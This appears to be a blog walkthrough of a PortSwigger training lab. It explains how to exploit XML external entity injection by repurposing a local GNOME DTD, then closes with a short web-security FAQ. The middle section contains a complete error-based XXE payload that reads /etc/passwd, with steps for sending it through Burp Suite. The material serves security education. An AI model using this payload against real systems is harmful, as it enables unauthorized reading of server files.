Exploiting XXE To Retrieve Data By Repurposing A Local DTD

Introduction

So, this is our 9th lab where we will be performing XML or XXE injection. This lab is provided by PortSwigger Web Security and is named “Exploiting XXE to retrieve data by repurposing a local DTD.” In today’s article, we will solve this lab.

Lab Description Of Exploiting XXE to retrieve data by repurposing a local DTD

Exploiting XXE to retrieve data by repurposing a local DTD

In this lab, we have a stock check feature that parses XML input but does not display the result. To solve the lab, we need to trigger an error message. Triggering the error message will display some content, including the “/etc/passwd” file. You will need the reference DTD file on the server.

Hint: The system is using the GNOME desktop environment, which provides its own DTD. Location: /usr/share/yelp/dtd/docbookx.dtd. There is an entity named ISOamso in it.

Lab Solution

Exploiting XXE to retrieve data by repurposing a local DTD

To solve the lab, first, you need to access the lab. After accessing the lab, you will see various products. Click on any product to view its details.

Exploiting XXE to retrieve data by repurposing a local DTD

Now, you will find a button labeled “Check stock.” Click on it and intercept the request in Burp Suite.

<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]>
Exploiting XXE to retrieve data by repurposing a local DTD

After intercepting, send the post-based request to the repeater. Copy the code provided above and place it between the XML declaration and the stock check element.

In the provided DTD, you can clearly see that we are attempting to access the file:///etc/passwd file from the server. Here, we are using the local DTD of GNOME.
 local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd
Exploiting XXE to retrieve data by repurposing a local DTD

we have successfully solved the lab called Exploiting XXE to retrieve data by repurposing a local DTD.

Congratulations!

If you want to learn web security, you can find all web security-related articles on our website. We upload articles on web security on a daily basis, so stay with us.

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.

Leave a Comment